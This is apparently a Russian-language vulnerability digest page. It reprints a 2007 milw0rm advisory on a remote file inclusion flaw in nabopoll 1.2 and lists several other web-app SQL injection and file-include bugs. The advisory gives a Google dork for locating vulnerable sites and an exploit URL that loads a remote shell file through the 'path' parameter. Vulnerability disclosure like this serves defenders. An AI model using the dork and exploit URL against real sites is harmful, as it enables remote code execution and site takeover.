Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability

CodeAvalanche News SQL Injection

nabopoll 1.2 Remote Unprotected Admin Section Vulnerability

ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities

From:	Cr@zy_King <crazy_king_(at)_turkusev.com>
Date:	15 февраля 2007 г.
Subject:	nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability

By Cr@zy_King

crazy_king@eno7.org

Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim

Script : nabopoll 1.x

Risk : Remote File .nclude | High

Site : http://nabocorp.com/

Google Dork : inurl:"nabopoll/"

Exploit :
include_once($path."includes/tags.inc.php");
include_once($path."config.inc.php");

Files: survey.inc.php

Exploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?

Ayyildiz.Org Present

# milw0rm.com [2007-02-15]